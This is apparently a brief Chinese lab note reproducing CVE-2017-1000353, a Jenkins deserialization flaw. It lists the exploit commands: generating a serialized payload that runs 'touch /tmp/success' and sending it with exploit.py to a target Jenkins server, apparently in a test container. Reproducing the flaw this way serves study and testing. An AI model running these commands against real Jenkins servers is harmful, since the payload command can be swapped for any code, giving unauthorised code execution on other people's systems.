漏洞复现
先下载CVE-2017-1000353-1.1-SNAPSHOT-all.jar
执行下面命令,生成字节码文件:
java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"
下载exploit.py,python3执行python exploit.py http://your-ip:8080 jenkins_poc.ser
,将刚才生成的字节码文件发送给目标
返回查看容器